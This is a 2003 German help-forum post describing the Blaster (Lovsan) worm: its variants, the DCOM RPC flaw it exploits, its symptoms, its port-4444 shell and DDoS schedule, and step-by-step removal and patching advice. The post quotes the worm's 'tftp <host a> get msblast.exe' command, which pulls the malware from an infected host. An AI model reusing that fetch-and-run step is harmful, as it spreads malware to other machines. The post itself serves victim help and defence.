.: News - Downloads - Hilfe Forum - Windows FAQ - Kontakt - Impressum / Datenschutz :.
  Navigation
    Startseite
    Newscenter
    Downloads
    Screenshots
    Forum
    Online Shop
    Spielhalle
    Bilder Upload
    Mitglieder Map

  FAQ Datenbank
    FAQ, Tipps, Hilfe
    CMD (DOS) Befehle
    Windows 2000
    Windows Vista
    Windows XP
    Server 2003
    Microsoft Office
    Security Bulletins
    Service Packs

  Update Packs
    Windows 2000
    Windows XP
    Server 2003

  Service
    Windows XP Slipper
    Slipstream CD
    MS Security Tools

  RSS Feed  
    Alle News
    Treiber News
    Software News
    Hardware News
    Microsoft News
    Alle Windows FAQ
    Windows 2000 FAQ
    Windows XP FAQ
    Windows Vista FAQ
    Update Packs
    Screenshots
    Downloads

  Surf-Tipp
    Kostenlose Online-Kurse zu MS Office, OpenOffice und Internet-Technik

Keine Kompromisse im Kampf gegen Kinderpornografie

Archiv Screenshots
Archiv FAQ
Archiv Community News
Archiv Spiele News
Archiv Konsolen News
Archiv Allgemeine News
Archiv Microsoft News
Archiv Hardware News
Archiv Treiber News
Archiv Software News
Zurück   Winhelpline Forum > Sonstige Themen > Allgemein Internet
msblast.exe in neuen Varianten msblast.exe in neuen Varianten
Passwort vergessen?

Allgemein Internet Alles zum Thema Internet, Browser, Viren und Würmer, Spam, Spyware, Trojaner, Mail u.v.m

Antwort
 
Themen-Optionen Thema durchsuchen Ansicht
Alt 16.09.2003, 11:37   #1
homeworker
Lord
 
Benutzerbild von homeworker
 
Registriert seit: 06.06.2001
Ort: Sachsen / Hessen
Alter: 44
Beiträge: 711



Standard msblast.exe in neuen Varianten
Der Blaster Wurm(W32.Blaster.Worm) unter neue Prozeßnamen unterwegs?

Namen:

W32/Lovsan.worm.a [McAfee], Win32.Poza.A [CA], Lovsan [F-Secure], WORM_MSBLAST.A [Trend], W32/Blaster-A [Sophos], W32/Blaster [Panda], Worm.Win32.Lovesan [KAV]

Name der Datei:

msblast.exe / penis32.exe / penis.exe / teekids.exe / root32.exe / index.exe / winlogin.exe

im Ordner:

C:\Windows\system oder C:\Windows\system32

Typ:

Internet Wurm

Grösse:

ca. 5 - 11 KB Größe je nach Variante, Original: 6.176 Bytes (UPX gepackt)

Betriebssystem:

Windows NT/2000/XP/2003
nicht betroffen: Windows 98 und Me

Verbreitung:

Netzwerke / Internet

Risiko der Infizierung:

sehr hoch

Schaden:

unkontrollierter Rechnerabsturz
Suche von weiteren Opfern über Port 135
DDoS-Angriff auf Microsoft-Server

Beschreibung:

Viele Experten warnten schon seit Wochen vor einer neu entdeckten Sicherheitslücke in Windows Systemen...

Mittlerweile sind weltweit Millionen Rechner infiziert!

US-Behörden warnen seit Ende Juli vor einem groß angelegten Hacker-Angriff auf das Internet. Nun tauchte der Internet Wurm Blaster beziehungsweise Lovsan auf, der eine DDOS-Attacke auf Microsoft vorbereitet. Dabei könnte es sich um besagten Großangriff handeln, urteilen Experten.

W32.Blaster.Worm ist ein Wurm, der sich über das Internet oder Netzwerke verbreitet.

Er nutzt dazu die sogenannte DCOM RPC Schwachstelle aus. Es handelt sich dabei um einen nicht geprüften Puffer im "Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) Interface". Durch Überschreiben der Puffergrenze kann ein beliebiger Programmcode ausgeführt werden. Diese Sicherheitslücke befindet sich in nicht gepatchten Windows NT/2000/XP-Systemen.

Informationen zu dieser Sicherheitslücke und den PATCH finden Sie hier:

- eine deutsche Beschreibung und den PATCH finden Sie hier

Windows 98 und Windows Me sind von dem Wurm nicht betroffen.


Kurz nach der Einwahl ins Internet startete der Rechner neu - immer wieder und wieder.
Ein untrügliches Zeichen: Das System ist vermutlich bereits infiziert.

Dienst "Remoteprozeduraufruf (RPC)" wurde unerwartet beendet.
Das System wird heruntergefahren. Speichern Sie alle Daten, und melden Sie sich ab.
Alle Änderungen, die nicht gespeichert werden, gehen verloren.
Das Herunterfahren wurde von NT AUTHORITÄT\SYSTEM ausgelöst

Tipp für Windows XP: Schalten Sie in den Eigenschaften von Arbeitsplatz (Systemsteuerung -> System) -> Erweitert -> "Starten und Wiederherstellen" die Option "Automatischen Neustart durchführen" ab, um etwaige "Bluescreens" zu sehen!

Windows XP/2003: Dr. Watson (Problembericht an Microsoft senden) erscheint ohne Grund.

Windows NT4.0/2000: Bluescreen bzw. Stop-Fehler.

Suche nbach dem Wurm: Vorhandensein einer zusätzlichen Exe-Datei (der Wurm!) in der Prozessliste (Taskmanager!). Im Original heißt der Wurm mblast.exe, es ist jedoch nicht auszuschließen, dass andere Varianten einen "unauffälligeren" Namen verwenden werden.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm selbst ist UPX-gepackt. Die msblast.exe enthält einen Text, der jedoch nicht angezeigt wird:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!

Zum automatischen Start erzeugt der W32.Blaster.Worm den folgenden Registrierschlüssel: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Run

"windows auto update" = msblast.exe

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Run

"windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill

Bei der Suche nach weiteren angreifbaren Rechnern werden zunächst die lokalen Subnetze durchsucht. Danach werden zufällige IP-Adressen zur Suche verwendet.

Weiterhin führt der W32.Blaster.Worm eine sog. DDoS-Attacke gegen Microsoft Server Externer Link www.windowsupdate.com durch.

Diese Attacke wird in den Monaten Januar bis August vom 16. bis zum Ende des Monats, in den Monaten September bis Dezember fortlaufend (täglich) durchgeführt.

Administratoren und private Anwender sollten mit einer Firewall die folgenden Ports sperren:

69 UDP
135 TCP
135 UDP
139 TCP
139 UDP
445 TCP
445 UDP
4444 TCP

Aktuelle Viren-Signaturen von Schutzsoftware erkennen die Datei MSBLAST.EXE während des Downloads.

Besonders Rechner von Privatanwender sind gefährdet! Die entsprechenden Funktionen und Schwachstellen sind in allen Versionen von Windows NT/2000/XP enthalten.

Blaster: Wurm-Nachfolger mit Backdoor-Funktion

Nur wenige Stunden nach den ersten Attacken des "Blaster"-Wurms ist ein Nachfolger im Netz aufgetaucht. Der "RPCSDBOT" verbreitet sich - wie "Blaster" - über die Sicherheitslücke im "Remote Procedure Call" des Windows-Systems. Der neue Schädling ist allerdings noch viel gefährlicher, da er dem Angreifer vollen Zugang zum infizierten Rechner gewährt und dieser jede Art von Programmen auf den infizierten Rechner ausführen kann. Außerdem arbeitet der Wurm mit einer "Backdoor", die sich mit einem IRC-Server verbindet. Über ihn soll das infizierte System kontrolliert werden.

Laut Microsofts Bulletin Board ist der Wurm über den TCP/IP-Port 135 eines mit dem Internet verbundenen PCs aktiv. Betroffen sind die Betriebssysteme Windows NT, 2000 und XP.

Anleitung zur Entfernung des Wurms

Sie akzeptieren mit der Nutzung unserer Seite die unten aufgeführten Nutzungsbedingungen!

1. Der Zugang zum Internet wird insbesondere bei Windows XP-Rechnern immer wieder durch einen Neustart unterbrochen. Dieser Prozess kann abgebrochen werden. Sobald eine Meldung erscheint, dass der Rechner heruntergefahren werden muß, klickt man im Startmenü auf "Ausführen...".

In der dann angezeigten Eingabezeile wird der Befehl "shutdown -a" eingeben und mit "OK" bestätigt._

2. Ein Neustart wäre zwecklos denn bei jedem Neustart eines infizierten Rechners lädt sich der Wurm automatisch ins System. Der Löschversuch von msblast.exe misslingt, weil der Prozess noch aktiv ist. Als erstes muss der Prozess msblast.exe beendet werden. Dazu startet man den Task-Manager und klickt auf Registerkarte Prozesse. Dann markiert man den Prozess msblast.exe und klickt auf Beenden (unten rechts). Die Warnung des Taskmanager bestätigen. Danach kann die Datei msblast.exe gelöscht werden.

3 . bei XP Rechnern die interne Firewall aktivieren / Windows 2000 ->Schritt 4:

- DFÜ oder Netzwerkverbindung beenden
- Rechtsklick auf "Netzwerkumgebung" auf dem Desktop, wählen Sie die Eigenschaften
- Sie finden dort den Eintrag für Ihre DFÜ oder Netzwerkverbindung -> Rechtsklick
- wählen Sie nun den Reiter "Erweitert" und aktivieren Sie dort die "Internetverbindungs Firewall"

4. Downloaden Sie den Patch von Microsoft -> Patch Download
5. Downloaden und starten Sie das kostenlose Fixblast.exe von Symantec -> Tool Download
6. Trennen Sie nun die Internetverbindung!

7. Starten Sie Ihren Registrierungseditor (Start->Ausführen-> Eingabe "Regedit")

8. Die folgenden Einträge müssen aus der Registry gelöscht werden. Sonst wird der Virus nach dem Neustart des Rechners wieder aktiv:

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run

"windows auto update" = msblast.exe

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run

"windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill

9. installieren und/oder aktualisieren Sie einen/Ihren Virenscanner -> Virenscanner Download

10. Zusätzlichen Schutz bietet eine Firewall, die derartige Angriffe verhindern kann.
Hierbei muß eine Regel definiert werden, die den Port 135 TCP und 445 TCP (incoming) blockiert.

11. Installieren Sie die aktuellsten kritischen Updates für die von Ihnen verwendete Version von Windows...

Erklärungen:__

DDOS-Attacke
Bei DoS-Attacken greift der Täter mit sehr großen Datenmengen den Server einer Site an. Dieser kann die Flut nicht bewältigen und geht zu Boden. Ein "normaler" Computer kann solche Massen nicht erzeugen. Deshalb nutzen die Verursacher oft unbemerkt die Maschinen ahnungsloser Dritter. Diese werden damit zu so genannten "Zombie-Hosts", man spricht von einer Distributed-Denial-of-Service-Attacke, kurz DDOS.

Externer Link http://msblast.de/


homeworker's Signatur Die Lösung für die Menschheit liegt in der richtigen Erziehung der Jugend, nicht in der Heilung von Neurotikern.
Alexander Sutherland Neill

Externer Link www.irishmen.de
homeworker ist offline   Mit Zitat antworten
Antwort

« Vorheriges Thema | Nächstes Thema »


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht
Linear-Darstellung Linear-Darstellung

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge anzufügen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.
vB Code ist An.
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.
Gehe zu

Ähnliche Themen
Thema Erstellt von Forum Antworten Letzter Beitrag
H+BEDV warnt vor neuen gefährlichen Bagle-Varianten: Newsbot News Archiv 0 01.03.2005 13:32
msblast.exe Ironangel Allgemein Windows XP 2 23.11.2003 08:29
Rpc Msblast nixpeiler Allgemein Windows XP 10 14.09.2003 14:17
RPC Probleme reboot und msblast.exe dreamchipper Allgemein Internet 7 15.08.2003 20:56
Was macht msblast.exe sammer Allgemein Windows XP 10 14.08.2003 18:54


Alle Zeitangaben in WEZ +1. Es ist jetzt 12:17 Uhr.

Alle Foren als gelesen markieren - Kontakt - WinHelpline - Datenschutzerklärung / Impressum - Nach oben

Powered by vBulletin Version 3.5.4 (Deutsch)
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 2.4.0
Copyright ©2000 - 2006, WinHelpline.info
  Werbung

  Moderatoren
   Schach
   Seefahrt
   Lotte Berk
   Netzwerkservice
   Football
   Webdesign

Partnerlinks:  3DCenter.org |  3DChips.net |  Planet 3DNow! |  3DChip.de |  Netzwerktotal |  Wintotal.de |  Elektrikforum.de |  Computerwissen.de |  Prad.de |  Winsoftware.de |  netzwelt.de |  WinFAQ.de